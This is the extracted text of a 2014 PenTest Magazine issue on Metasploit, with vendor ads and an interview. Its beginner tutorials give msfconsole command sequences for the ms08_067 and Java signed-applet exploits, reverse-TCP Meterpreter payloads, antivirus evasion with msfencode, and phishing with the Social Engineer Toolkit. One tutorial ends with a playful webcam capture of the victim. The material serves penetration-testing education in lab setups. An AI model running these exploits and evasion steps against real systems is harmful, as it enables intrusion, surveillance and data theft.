Cyber Security Auditing Software
Improve your Firewall Auditing As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand. he network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail e.g. web service query tools. However this is only part of the picture and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve. www.titania.com
With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.
You can customize the audit policy for your customer’s specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own companies styling. Each report can then be saved in a variety of formats for management of the issues. Why not see for yourself, evaluate for free at titania.com
Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania’s products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems. www.titania.com
SECRETS OF METASPLOIT
Copyright © 2014 Hakin9 Media Sp. z o.o. SK
FOR REAL BEGINNERS
08
Introduction to Metasploit By Manasdeep
Get general information about Metasploit functions. The author gives answers to main questions about Metasploit and describes methodology for running it.
Hacking – Hands-on By Jordan M. Bonagura
17
If you want to know how to hack the system but this is a new field for you, the article give you simple and easy way to become professional.
SPECIFIC GUIDES How to Hack Windows in 5 minutes By Rafael Fontes Souza
Step-by-step guide on how to exploit Microsoft Windows 8. Graphical images will help you easy understand each step! Like a BONUS an author gave an interview. You can check it below the article!
TOOLS
20 25
Metasploit and Penetration Testing By Maher Abdelshkour
Everything you need to know about Metasploit is in one article. Find out general facts and commands about Metasploit to bacome a professional pentester!
Multiphase Penetration Testing: Using BackTrack Linux, Metasploit, and Armitage By Lance Cleghorn
26
A clear description of each phase of pentesting for those who wants to find out about common attacks. Easy, simple and understandable!
ATTACK SCENARIOS Pentesting Windows using Metasploit Framework By Omkar Prakash Joshi
The article will demonstrate all attacks in virtual environment. Learn how to create security tools and exploits through Metasploit Framework.
4
42
SECRETS OF METASPLOIT
Metasploit for Exploits Development: the Tools Inside the Framework By Guglielmo Scaiola
49
Graphical interpretation of the attack. The author will show you how you can take advantage of the framework and how easy it it is to use it!
FOR PROFESSIONALS Pentesting with Metasploit Pro By Cristian Stoica
Get to know additional features of Metasploit and pro version of it. Go through the whole process from running a penetration test to writing a report.
HeartBleed Bug Exploiting with Metasploit By Alessandro Parisi
Author shows the nature of Heartbleed Bug and its impact on a server. Become aware of possible damage to prevent from it!
Exploit a Vulnerability with Metasploit By Azza Nafti
60 70 75
Explore Metasploit and security volnerability in brief. The author gives you a small example to show theory through practice. advertisement
SECRETS OF METASPLOIT
Dear PenTest Subscribers,
W
e are proud to present a brand new Pentest Magazine, as you might have already noticed, we upgraded our webiste, we are going to improve a lot things, because we are changing for you.
In new issue, we are highliting secrets of Metasploit. If you ever think about, how to hack in Windows in 5 minutes, you’ll get an answer. In this article everybody is going to understand techniques of exploiting the operating system Microsoft Windows 8 and Windows 7 SP 1, of course only for teaching purposes, for network administrators and security specialists understand how the mind works and to prevent the attacker. Our authorities had prepared a set of features explaining the types of the Metasploit attacks, and ideas how prevent being hacked. You will get know everything about pentesting with Metasploit Pro, tools inside the framework, heartbleed bug exploiting with Metasploit. You will find out about Multiphase Penetration Testing: Using BackTrack Linux, Metasploit, and Armitage. We are sure that you will like work with Metasploit, we gave much effort for you to explain everything step by step. Best wishes from PenTest Magazine
6
Editor in Chief: Milena Bobrowska
[email protected] Managing Editor: Milena Bobrowska
[email protected] Editorial Advisory Board: Jeff Weaver, Rebecca Wynn Betatesters & Proofreaders: Abishek Kar, Phil Patrick, Steven Wierckx, Krishore PV, Tim Thorniley, Tom Updegrove, Elia Pinto, Brandon Dixon, Ivan Gutierrez Agramont, Sandesh Kumar, Pradeep Mishra, Amit Chugh, Johnette Moody, Steven Hodge, Michał Stawieraj, Kashif Aftab, Jeff Smith, Jordi Rubio, Mardian Gunawan, Arnoud Tijssen, David Kosorok, Mbella Ekoume, Viswa Prakash, Michal Jahim. Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine. Senior Consultant/Publisher: Pawel Marciniak CEO: Ewa Dudzic
[email protected]
[ GEEKED AT BIRTH ]
DTP: Ireneusz Pogroszewski Art Director: Ireneusz Pogroszewski
[email protected] Publisher: Hakin9 Media Sp. z o.o. SK 02-676 Warsaw, Poland ul. Postepu 17D Phone: 1 917 338 3631 www.pentestmag.com Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.
DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
You can talk the talk. Can you walk the walk?
[ IT’S IN YOUR DNA ] LEARN: Advancing Computer Science Artificial Life Programming Digital Media Digital Video Enterprise Software Development Game Art and Animation Game Design Game Programming Human-Computer Interaction Network Engineering Network Security Open Source Technologies Robotics and Embedded Systems Serious Game and Simulation Strategic Technology Development Technology Forensics Technology Product Design Technology Studies Virtual Modeling and Design Web and Social Media Technologies
www.uat.edu > 877.UAT.GEEK Please see www.uat.edu/fastfacts for the latest information about degree program performance, placement and costs.
SECRETS OF METASPLOIT
Introduction to Metasploit by Manasdeep Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. It provides end to end framework for penetration testing for: • Information gathering • Vulnerability Scanning • Pre Exploitation • Post Exploitation • Exploit Development Metasploit greatest advantage is that it is open source and freely extendable. You can customize it by including your exploit and payloads as per your need. A security pentester can check the custom made applications specific to an enterprise against his customized exploits and payloads. If a security researcher crafts a new attack, then a custom made payload can carry out most of the attack purpose. Today, software vulnerability advisories are often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk, and remediation of that particular bug.
Architecture of Metasploit
For the sake of simplicity, we shall concentrate only on the Interface and the module part of Metasploit for this article.
8
SECRETS OF METASPLOIT
Platform Used for demonstration We are currently demonstrating Metasploit features with the help of Backtrack OS. All screen shots of working of metasploit are taken from there. We have VMware image of Backtrack 5 R1 OS with this configuration:
We login in Backtrack 5 R1 OS with credentials as root and password as toor. Type startx to load the GUI screen of Backtrack.5. Metasploit is typically found on this location in Backtrack OS.
Metasploit Interfaces • Msfconsole: The console and the most powerful of all interfaces. Can support multiple sessions • Msfcli: Single command interface. Supports only one session • Msfd: Provides a network based interface to msfconsole • Msfweb: This is web based interface.
Good Practices for using Metasploit Updating via Msfupdate
It is always beneficial to have updated Metasploit framework before beginning to work on it. This way we can stay current for all the exploits and payloads offered for the framework.We use the Msfupdate utility to update the Metasploit framework.
9
SECRETS OF METASPLOIT Here is the path for the Msfupdate utility:
Port scanning via Nmap
It is good idea to identify the open ports and the services running on them using a versatile tool such as nmap. It gives us the clearer picture on what areas and ports we need to focus our energy to run the exploit. Knowing the service version number helps us greatly to select the known exploits available in Metasploit with their associated payloads. Here is an example of the nmap scan:
Meterpreter: Metasploit’s Payload
A payload is the piece of software that lets you control a computer system after it’s been exploited. It is typically attached to the exploit. Meterpreter is the best known payload of Metasploit. Meterpreter enables users to control the screen of a device using VNC and to browse, upload and download files. What typically payloads allow you to do after execution of exploit?
• Add a new user to victim machine • Opening the command prompt on a specific port of victim system and running the commands from there • Reverse connecting a command shell to issue the commands from your end What is a meterpreter?
Meterpreter is short form for “Metasploit Interpreter” which is a powerful payload allowing you to do many things on the compromised system such as manipulating local files in system etc. Used for write and execute advanced commands on the default shell of the victim system.
10
SECRETS OF METASPLOIT What makes Meterpreter so powerful?
Meterpreter runs ’in memory’ of the exploited process which makes it very quiet and stealthy to evade detection by the antivirus and other analysis tools. It leaves very small traces in the compromised system while in turn giving the attacker maximum space to carry out activities such as navigating local file system, port forwarding, tunnel connection from victim machine to other system, push entries in registry, modify network configuration, download confidential files etc. In short, once you get the meterpreter running you can pretty much do anything related to a hacked system. How this is achieved?
Meterpreter achieves this by providing API on which programmers can write their specific extensions which can be uploaded as shared DLL’s running within the memory of the exploited process. How this is helpful to pentesters’?
Metasploit using meterpreter avoids executing a new process or sub-process and maintains the stealth-ness of the attack. It comes with built-in commands and extensions that allow obtaining system information, configuring port forwarding, as well as uploading and executing binaries and DLLs. It basically evades detection largely by any analysis tool. Running Metasploit
This is the path for running metasploit from backtrack OS.
Once started, we get the msfconsole as follows:
11
SECRETS OF METASPLOIT Methodology for running an exploit from msfconsole commands
• show exploits: This command will give you the extensive list of the exploit available in Metasploit.
• use
:
Using the exploit for your victim machine
• show payloads: Gives out the name list of available payloads specific to exploit chosen.
• set PAYLOAD
:
Sets the payload which is actually executed after successful execution of your chosen exploit.
• show OPTIONS: Lists out the options such as RHOST, TARGET followed by its value associated with the selected exploit and payload.
• exploit: Executes the Exploit against target (victim’s) system If exploit executes successfully, then the payload embedded in it is injected into the victim machine to carry out the intended activity. If unsuccessful, then corresponding error message is shown.
12
SECRETS OF METASPLOIT
Msfencode Many times during payload execution, we come across bad characters such as Null (0X00) byte, new line characters which can be trapped by built in application which uses sanitization filters on received input. This utility helps us to encode the exploit and get rid of bad characters to bypass those input filters. It also significantly reduces the dangers of being caught by IDS tool. Example
Suppose we are producing meterpreter executable met.exe as follows: Code: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=4444 X > /var/www/met -.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: LHOST=192.168.1.67,LPORT=4444
Now, when we try to download this file from the “victim” PC, we get an error message because our antivirus has detected an intrusion attempt. Let us see what happens when we apply the encoding techniques: Code: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=4444 R | ./msfencode -t exe > /var/www/metenc1.exe [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
Notice the size of the file changed from Length: 290 to size 318. The text marked in blue shows us that the attack has been successful.
How does it help the pentester? Pentester has more control and flexibility for crafting his payloads and sent them across its target. He can now demonstrate more creativity to encapsulate his payloads for delivering to destination host machine to achieve its exploit’s objective.
Automating the Pentest We can completely automate a pen-test from scanning remote systems to identify vulnerabilities, and then launch exploits against these systems. We have the following options to import reconnaissance data: • db_import_nessus_nbe: Import an existing Nessus NBE output file • db_import_nmap_xmlI: Import data from an existing Nmap XML output file • db_nmap: Execute Nmap through the framework and store its results in the database The command db_autopwn, references the reconnaissance data, links it up with matching exploit modules, selects exploit modules based on open ports and launches the exploit modules against the matched targets.
Using db_autopwn
13
SECRETS OF METASPLOIT
Auxiliary Module system The Auxiliary module system is a collection of exploits and modules that add to the core capability of the framework. They are basically suited for information gathering purposes. These are automated scripts performing a certain task. We can specify single or multiple ranges to be targeted. Popular uses are in port scanning, fuzzers, DoS scripts etc.
Popular Auxillary Modules • scanner/smb/version: Determine the operating system version and service pack level of a Windows target system using SMB fingerprinting. Use info for more information • scanner/discovery/sweep_udp: Scans a single host or a specified range of hosts for UDP services, and decodes the results. Eg.
Searching Auxiliary modules: We can narrow down our search to a few modules when using search operator. E.g.. Search all modules with scanner/http.
14
SECRETS OF METASPLOIT
How it is helpful to pentesters? The auxiliary module system allows excellent information gathering activities, matching systems to available exploits, executing exploits, managing the multiple exploit sessions, and storing all of this information in a database.
Social Engineer Toolkit This toolkit was created to fill the gap between the penetration testers’ and social engineering. This helps tremendously to craft a clever malicious file to trap innocent users to click on it. The interface is very simple to use. Just select the option no in the menu and we are good to go! We can access the SET took kit as follows:
We are greeted with SET toolkit splash screen as:
Now in this menu driven program, all we have to do is select our attack vector, craft it as per instruction and send the link / email to the user. The innocent user when opens the link or attachment falls victim to our social engineering tricks and we have easy access to his system. We can try all the options in the SET toolkit menu and follow the instructions accordingly to launch a successful attack t compromise the victim machine.
How this is helpful to pentesters’? Pentesters can now readily demonstrate to management how an attacker with malicious intent can abuse the trust of the people of the organization to gain access to the most sensitive information. By exploiting and presenting the real world tests on phishing, it can be shown that social engineering is the strongest threat to the organization. Its target is people, not the systems to gain access to confidentiality.
General Precautions for using Metasploit Metasploit is no doubt a very powerful and handy tool for an effective and thorough penetration and exploit testing. But if used improperly, may result in very unpleasant situations where whole server might be forced to shut down during testing costing millions to an organization. Here are some good practices to follow whenever we are going for penetration and exploit testing. 15
SECRETS OF METASPLOIT a. Proper backup: It is highly recommended that the backups must be taken before any penetration exercise is undertaken, else the loss of information and its unavailability for the time being might prove fatal to business if in case something goes wrong. It works as a second line of defense. b. Prior management approval: It is crucial that proper “written” authorization letter is obtained from management before proceeding for any exploit testing. This removes the burden of facing any legal lawsuits if in case things go wrong. c. Inform first, and then exploit: The good rule of thumb is to inform the senior management about the risk and ask their call on the issue. If you receive green signal to proceed with the exploitation part, obtain written approval and then demonstrate. d. Training: Security awareness is the strongest deterrent for any risk for valuable information leakage. Through the live demonstration of SET inform the IT and other office staff how to stay on guard by not falling victim to the social engineering methods.
Conclusion Metasploit is helpful in determining if the given vulnerability is actually exploitable or not. It lets us know if there actually a risk associated with the vulnerability which can be exploited. This automatically cleans out any instances of false positive which are typical feature of many automated scanners. Automated scanners don’t tell you if vulnerability is a potential risk or not as they don’t check that against a known exploit. But metasploit does that. Hence, a better risk assessment judgment can be made using metasploit. Metasploit can also be frequently used by pentesters to demonstrate successfully the potential extent of damages that an attacker is capable of after successful break-in by or post exploitation activities. This can also help us to better rate the severity of the risks associated with the discovered vulnerability of the system.
References • • • • • • • • •
http://www.metasploit.com/ http://blog.metasploit.com/ http://www.offensive-security.com/metasploit-unleashed/ http://en.wikipedia.org/wiki/Metasploit_Project http://www.metasploit.com/about/penetration-testing-basics/payload.jsp http://www.offensive-security.com/metasploit-unleashed/ http://insidetrust.blogspot.in/2010/08/hacking-techniques-using-msfencode-to.html Metasploit Toolkit for Penetration Testing by David Maynor Metasploit: The Penetration Tester’s Guide by David Kennedy
16
SECRETS OF METASPLOIT
Hacking – Hands-on by Jordan M. Bonagura When I have decided to write this article, I thought of working with a model without a lot of theory and much more hands-on. The goal is to write for an audience of beginners who want to know how to hack a system, but don’t have any idea how to do it. I’m sure that usual article must have all technical stuff to prove why it’s possible and more than that,to teach what happens in each step, but in this case I chose to write something for that guy that wants to hack for the first time, so, in my opinion, this guy can be motivated to learn more and more and start to discover a new hacking world. I have to emphasize here the importance that any kind of test should be perfoming in your own environment with your virtual machines and always for ethical purposes. So, let’s talk about our environment: We’ll use 2 different virtual machines that will have these configurations bellow: O.S. Backtrack Windows XP
IP Address 192.168.0.1 192.168.0.100
With the right environment, we can go to the next step. Using the Backtrack machine, we can start the Metasploit application using the msfconsole command. Before we start to hack, we can see some interesting commands, for example the version that we are using with the version command in the metasploit prompt, and get some help with help command.
Figure 1. Help – msfconsole 17
SECRETS OF METASPLOIT To see the exploits and know more about each one, you can run the show metasploit prompt.
exploits
Figure 2. Show exploits command – msfconsole Environment 1 → Windows XP info windows/smb/ms08_067 use windows/smb/ms08_067 show options set RHOST 192.168.0.100 set target 0 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.1 check exploit
Figure 3. Info command – msfconsole
18
command inside the
SECRETS OF METASPLOIT
Figure 4. Show options command – msfconsole After running the exploit there will be an open session where you can type the pwd command and check what that you are inside the C:\Windows\System32, another command that can be used is sysinfo to show you detailed informations about the O.S. Now that you’ve learned how to hack the Windows XP, you need to go deeper and begin to understand how these exploits really works and how they use technical skills to explore vulnerabilities. You can try to understand some concepts of computer networks and operating systems too. Remember only studying concepts you will be really able to succeed in your hacking strategies. In my next article I will show how to explore a Linux O.S. using metasploit.
About the Author CEO – Hades Coding Consultant and Researcher in Information Security / CEH Stay Safe Podcast Founder Computer Scientist Post Graduated in Business Strategic Management, Innovation and Teaching Founder – Vale Security Conference – Brazilian Conference Consultant Member – Brazilian Comission of High Tech Crime (OAB / SP) Coordinator and Teacher in IT area SJC Hacker Space President Speaker (CNASI, AppSec California, H2HC, Angeles Y Demonios, Silver Bullet, Seginfo, ITA, INPE, etc)
19
SECRETS OF METASPLOIT
How to Hack Windows in 5 minutes by Rafael Fontes Souza (CISO of HackersOnlineClub) Readers, in this article everybody is going to understand techniques of exploiting the operating system Microsoft Windows 8 (only for teaching purposes, for network administrators and security specialists understand how the mind works and to prevent the attacker). Through the Metasploit you will learn how to hack some machines with Windows OS vulnerable, Windows 7 SP1. Other OS is also applicable. This exploit works “using Java Signed Applet Method” on any browser, but requires the java plugin installed, a file is created. “Jar”, it is necessary that the target open a URL and allow the java applet to run in the browser. The applet is presented to the target through a web page. The Java Virtual Machine, of the victim will pop up a window asking if they trust the signed applet, after the victim clicks on “run” the applet is run with full permissions.
Step By Step Requirements for pentest: 1. You must have installed the Windows 8 operating system. 2. Some target computer or VMware (Virtual Machine) with a Linux distribution, can be Backtrack or Kali, whatever, the important thing is to have the “metasploit” up and running. First, you need to open the terminal and enter the command: “msfconsole”
Figure 1. Open metasploit After, we choose the exploit to use: Let’s type use
exploit/multi/browser/java_signed_applet.
Press enter and type “Show options”.
20
SECRETS OF METASPLOIT
Figure 2. Use exploit and show options
Essential concepts The SRVHOST and SRVPORT have defined default values 0.0.0.0 and 8080. The SRVHOST is the IP address that the server will work to make the connection url to be opened by the target browser. SRVHOST is set to 0.0.0.0, the target must be able to connect to this machine using your public ip.
Figure 3. Set payload The LHOST should be the IP address that the victim is connected.
Figure 4. LHOST and exploit
21
SECRETS OF METASPLOIT When the target open this link on your browser displays a warning in a dialog box. A window will open, and the victim can check the “I accept the risk and want to run this application”, click “Run”.
Figure 5. Java applet
Finishing Therefore, after the victim opens the malicious URL, then click Run, Metasploit will start a meterpreter session to the target machine, and you get full access! You can directly run “sessions l” to see the active sessions. Example: sessions-i 1, where 1 is the ID of the session. The applet is able to connect to Metasploit. Meterpreter session starts and is ready, as planned, and available options for you to exploit the system.
Figure 6. Session starts This article is only for ethical hacking, now you can have fun with the commands.
Figure 7. Webcam shot: Just 4 fun 22
SECRETS OF METASPLOIT
About the Authors Rafael Fontes Souza Rafael Fontes Souza is Chief Information Security Officer of HOC and Business Partner at Voice of Green Hats Company, good communication in groups and the general public, started studying with thirteen years(SQL database), have extensive experience in operating systems such as Linux, UNIX, and Windows. He is member of French Backtrack Team, in the project Backtrack Team made partnerships with groups from France, Indonesia and Algeria, was prepared a collection of video lessons and made available on the website. Founder of Wikileaks and Intelligence, actively help to increase the safety and develop softwares for HackersOnlineClub(Indian), contributes to magazines and websites from countries like Poland, Pakistan, USA and others. Ziaullah Mirza Ziaullah Mirza (founder Voice of Green Hats) is a mature and an enthusiastic individual who believes in snaking up my ladder with honesty and hard work. He possesses a strong personality, excellent communication and interpersonal skills. He has equipped with the ability to respond to queries, manipulating problems analytically, to assess situation and then resolve the problem quickly and professionally. He is a highly motivated, eager to learn and able to work under busy/stressful conditions to be one of the leading roles within the organization. In the view of new technology and competitiveness in educational market and sustainability of job market.
INTERVIEW WITH ZIAULLAH MIRZA (Owner: VOICE OF GREEN HATS) AND RAFAEL FONTES SOUZA (Chief Information Security Officer) What kind of vacancies do you have for penetration testers? For which kind of projects?
We normally hire Ethical Hacks/ security professional for Cyber Security projects. Project nature could be for Pen-testing cyber tools in order to deploy for educational institutional. Some project related to reverse Engineering of viruses or Trojans in order to find the reality and inside of it. How many penetration testers does your company hire? Do you look for them ongoing?
As we hire for period of projects so a number of pen-testers are required may vary, sometimes 10 to 50 and sometimes this amount is only 2 to 3 individuals How does you recruitment process look like?
It is quiet clear and open for those who are interlinked with our forums or network. To evaluate whole process with a team of experienced and highly qualified people but we always try our best to make set. What certifications are required, what certifications are a plus
As you know “Voice of Green Hats” is training and solutions provider so we always look for those guys who are certified by “Voice of Green Hats” so we normally look for certificate like “Executive Certificate in Cyber Security” ECCS. What are the characteristics or traits of the top testers you have at the moment?
They are highly qualified and best performers in their tasks. They have experience for International projects in Pen-testing and have been awarded accordingly. If I were to ask your pentesters about working for your company what would they say?
I am confident, they will respond in a positive way as they are working as professional environment with life entertaining facilities as well. Working with Voice of Green Hats “VOGHs” is not as strict as you have to present yourself physically in office. They can choose the way how they are going to perform the task easily. 23
SECRETS OF METASPLOIT Sometimes people need their selected environment that we might not able to provide etc as long as project is done professionally and perfectly. What is the average tenure of the testers working here?
As I said, it always depends on the project they are working on. Sometimes it is short like weeks or sometimes it is years. What is the strategic direction of the company? How you involve testers in this strategy?
Strategic direction is one of trade secret for us. As the founder of “Voice of Green Hats” I keep this secret with me. But as you questioned here I would like to tell the main tool that is CI “Competitive Intelligence”. You can also get this experience by taking ECCS course or one of our certificate related to CI. I am sure, you will not divert you direction thinking “I do strategic marketing of my certification here in Interviews”. What value can pentesters lend to the strategic mission of the company?
They are all working on the directions given by project manager or project directors. But key structure of strategic approach is unidirectional and that is where I am watching it. What is the greatest challenge pentesters face in your company?
Have you ever closed your look at the law enforcement organizations around the world, they are all backed by Governments, agencies etc. with all facilities of life and payment to make them work more hardware as well as encouragement to work diligently. But our pentesters only have payment of work they do. I cannot encourage them as good as governments do. But I still try my best. What makes your company superior to your competitors?
Our work speaks for itself, we don’t compete anyone in the Cyber World, that is what makes us superior to all those who consider themselves our competitors. How do you attract TOP pentesters?
Our name brings them to us. Hi, thanks for giving me your time. Please introduce yourself to our Readers.
A: Hey Guys, My name is “Rafael Fontes Souza”, I am the CISO of HackersOnlineClub, Founder of the “Wikileaks, and Intelligence” and now partnership with Voice of Green Hats Company, my main interests include Cryptography, Security Research, Penetration Testing. In my free time I like to write for websites and magazines where I can have the opportunity to convey my knowledge. Rafael, tell me more about your partnership with Voice of Green Hats?
I am currently writing a book on cryptography (since the most advanced quantum and classical techniques) and we plan to turn into a certification... What are the biggest challenges that the field of information security is suffering from?
It is known that a lot of espionage occurs by some governments and also by competitors, they should remember that privacy is important, encryption is a positive and honest way to protect sensitive data, if there is no respect between nations cyber war can be the scenario. What advice would you suggest to new Hackers?
Be humble and always seek to study and seek help from the more experienced; make the right choice wherever you are, act ethically.
24
SECRETS OF METASPLOIT
Metasploit and Penetration Testing by Maher Abdelshkour When you ask about “Penetration Testing tool” the first thing that comes to my mind is the world’s largest Ruby project, with over 700,000 lines of code ‘Metasploit’. So what exactly is metasploit? In this article, you will learn about the following • • • • • • • • •
What is Metasploit Metasploit Terms and Definitions what is msfpayload MSFConsole MSFcli Important Metasploit Commands Metasplot Reliability rankings Velnerabilities Penetration Test LAB
Who should read this article?
• This article would be essential to any industry that has to test regularly as part of compliance requirements or regularly tests their security infrastructure as part of healthy security practices. • Penetration testers • Vulnerability assessment personnel • Auditors • General security engineers • Security researchers
A basic understanding of computer fundamentals such as the command line, networking, and TCP/IP networking would be helpful. The requirements would be the same as for SANS 560.
Introduction Metasploit is a framework used for storing, deploying, and creating exploits. An exploit is a piece of code which can interact with other programs to let the attacker (you) execute bits of code on the victims computer. It also has a wonderful tool known as msfpayload. The framework includes hundreds of working remote exploits for a variety of platforms. You can mix and match payloads, encoders, and NOP slide generators with exploit modules to solve almost any exploit-related task. A penetration tester simulates an attack on a customer’s network by trying to find a way inside. Many such attacks begin using a scanning tool, such as NeXpose, Nessus, or Nmap, to look for network vulnerabilities; however, several of the leading Intrusion Detection/Protection systems are capable of alerting the network owner when a scan is in process. Rather than scanning for an open port, a devious alternative is to email a payload to the victim that will allow the attacker to establish a foothold on the victim’s network. By following this article, you’ll evaluate your security posture using the same process skilled attackers follow. You’ll learn how to perform reconnaissance, exploit hosts and maneuver deeper into your network. But before proceeding, I want to let you know some Metasploit Terms and Definitions. Exploit – to take advantage of a security flaw within a system, network, or application. Payload – is code that our victim computer to execute by the metasploit framework. Module – a small piece of code that can be added to the metasploit framework to execute an attack. Shellcode – a small piece of code used as a payload.
25
SECRETS OF METASPLOIT
What is msfpayload? msf payload is used in conjunction with msfcli and msfenocde. Together, they are a set of tools which creates a file that connects back to your computer, encodes the file, and sets up a listener for said file. This method completely bypasses the need for exploits, but requires social engineering skills to somehow get your file on their computer and for them to execute it. (or just sneak a flash drive in while their not looking and execute it for them, but I don’t recommend that.) Sounds great right? A skilled intruder who delivers a payload to your network in the form of an email message will want to make sure the payload can evade detection by antivirus software. Most antivirus software vendors use a signature base to identify malicious code. To avoid antivirus detection, an intruder must devise a payload that will not match the available antivirus signatures.
MSFconsole Msfconsole is an all-in-one interface to most of the features in metasploit. Msfconsole can be used to launch attacks, creating listeners, and much, much more. We will be using Msfconsole throughout these tutorials, but mastering it will allow you to keep up with metaspolits rapidly changing framework. Metasploit comes installed by default on backtrack 5. To access msfconsole, open your console and type: root@bt: ~# cd /opt/framework3/msf3/ root@bt: ~#/opt/framework3/msf3# msfconsole
MSFcli Msfcli is another way to access the metasploit framework but focuses more on scripting and interpretability with other console-based tools. To view the msfcli help type: root@bt:~# cd /opt/framework3/msf3 root@bt:~# msfcli –h
Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are some of the commands that you will use most. Command search
Usage Typing in the command ‘search’ along with the keyword lists out the various possible exploits that have that keyword pattern. show exploits Typing in the command ‘show exploits‘ lists out the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit. show payloads With the same ‘show‘ command, we can also list the payloads available. We can use a ‘show payloads’ to list the payloads. show options Typing in the command ‘show options‘ will show you options that you have set and possibly ones that you might have forgotten to set. Each exploit and payload comes with its own options that you can set. info If you want specific information on an exploit or payload, you are able to use the ‘info’ command. Let’s say we want to get complete info of the payload ‘winbind’. We can use ‘info payload winbind‘. use This command tells Metasploit to use the exploit with the specified name set RHOST This command will instruct Metasploit to target the specified remote host. set RPORT This command sets the port that Metasploit will connect to on the remote host. set PAYLOAD This command sets the payload that is used to a generic payload that will give you a shell when a service is exploited. set LPORT This command sets the port number that the payload will open on the server when an exploit is exploited. It is important that this port number be a port that can be opened on the server (i.e.it is not in use by another service and not reserved for administrative use), so set it to a random 4 digit number greater than 1024, and you should be fine. You’ll have to change the number each time you successfully exploit a service as well. exploit Actually exploits the service. Another version of exploit, rexploit reloads your exploit code and then executes the exploit. This allows you to try minor changes to your exploit code without restarting the console help The ‘help’ command will give you basic information of all the commands that are not listed out here.
26
SECRETS OF METASPLOIT
Understanding Metasploit reliability rankings As part of Metasploit’s rigorous 3-step quality assurance process, we rank exploits by reliability. Knowing the ins-and-outs of the rankings protects the stability of the systems so your IT operations buddies remain happy bunnies. Each Metasploit exploit, and indeed each module, is classified according to five reliability levels. Modules include exploits as well as auxiliary modules, such as brute forcing modules, and payloads. Understanding the reliability rankings is key to safely test production systems.
Vulnerabilities are unintentional APIs Vulnerabilities are APIs that weren’t entirely intended by the developer. They hey are also undocumented and unsupported. Some of these vulnerabilities are exploited more reliably than others, and there are essentially three vectors to rank them: • Exploit success rate: Some exploits will get you a session every time. Others are more hit-and-miss, or they may only work on the first try but not the second. • Target system stability: Other exploits can get you a session but the process makes the system unstable. Think of a denial of service module as an extreme case of this vector. • Fingerprinting: Does the exploit reliably fingerprint the target system to ensure that it only works on tested target systems? Using an exploit on the wrong system can potentially destabilize the target system.
Countermeasures • Only use exploit modules with a reliability ranking of “Excellent” or “Great” on production systems: You read the blog post – you know why! • Communicate with IT operations: Use only Before testing on production systems, it may be a good idea to talk to the application owners ahead of time to ensure that they’re aware, buy into the process, and alert you if anything has gone awry. • Test during maintenance windows: To play it extra safe, conduct your penetration test during official maintenance windows. We recommend not testing systems that are being serviced since this will make troubleshooting more difficult. • Use the Audit Report to analyze situations: Of course, production systems can also go down without your having had any part in it. To protect you from unwarranted allegations, use the audit report in Metasploit Express or Metasploit Pro to prove when you did and did not touch certain systems. • Throw the kitchen sink at test systems: Testing only with 4 and 5 star modules is great for production but less reliable vulnerabilities can still let a malicious attacker in who doesn’t care about target system stability. If you have a test system that mirrors your production environment, throw everything you’ve got at it to cast a wider net. We still recommend also testing production it may not be a perfect image of your test environment. Now that we have the basics of Metasploit concepts and commands down, let’s hack a system! Lab Setup Victim Machine OS: Windows XP SP2 Operating System IP: 192.168.1.56
27
SECRETS OF METASPLOIT Attacker (Our) Machine OS: Ubuntu 14.04 TLS 32-bit OR Backtrack 5 R3 Metasploit Version: 4.7 IP: 192.168.1.55
